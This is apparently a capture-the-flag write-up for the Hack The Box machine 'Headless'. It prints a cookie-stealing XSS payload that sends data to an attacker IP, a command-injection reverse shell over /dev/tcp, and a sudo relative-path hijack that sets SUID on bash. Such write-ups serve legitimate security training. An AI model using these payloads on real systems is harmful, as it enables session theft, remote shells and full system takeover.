Headless

Posted 2026-03-20Easy Linux HTB
HTBLinuxEasyWebCommand Injection
Headless

Reconnaissance

We start with a standard nmap scan:

</> bash
nmap -sC -sV -oN nmap/initial 10.10.11.8

Ports open:

  • Port 22 — SSH (OpenSSH)
  • Port 5000 — HTTP (Werkzeug/Python)

Enumeration

Visiting port 5000, we see a simple countdown timer. Directory fuzzing reveals a /support endpoint.

</> bash
gobuster dir -u http://10.10.11.8:5000 -w /usr/share/wordlists/dirb/common.txt

The /support page contains a form that allows us to submit a message. Inspecting the request, we notice that the User-Agent string is being logged and reflected if it triggers a cross-site scripting (XSS) payload.

Foothold

By injecting a blind XSS payload into the User-Agent header, we can steal the administrator's cookie.

</> bash
curl -X POST http://10.10.11.8:5000/support -d "message=test" -H "User-Agent: <script>var i=new Image(); i.src='http://10.10.14.5/?cookie='+btoa(document.cookie);</script>"

We start a local Python HTTP server and quickly receive a callback containing the admin cookie. We then use this cookie to access a hidden /dashboard that we couldn't reach before.

On the dashboard, there's a feature to generate reports. This feature is vulnerable to Command Injection. We construct a payload to spawn a reverse shell:

</> bash
POST /dashboard HTTP/1.1
Cookie: admin=...

date=2026-03-20;bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

We catch the shell as dvir. Grabbing the user flag:

</> bash
cat /home/dvir/user.txt

Privilege Escalation

Checking sudo -l, we see that the user can execute /usr/bin/syscheck without a password.

</> bash
sudo -l
# User dvir may run the following commands on headless:
#    (ALL) NOPASSWD: /usr/bin/syscheck

Looking at /usr/bin/syscheck, it's a bash script that executes initdb.sh using a relative path without specifying an absolute directory.

We can exploit this by creating a malicious initdb.sh in our current directory, making it executable, and running sudo /usr/bin/syscheck.

</> bash
echo "chmod +s /bin/bash" > initdb.sh
chmod +x initdb.sh
sudo /usr/bin/syscheck

The script executes our payload, setting the SUID bit on /bin/bash.

</> bash
/bin/bash -p
whoami
# root

Root flag captured! 🏴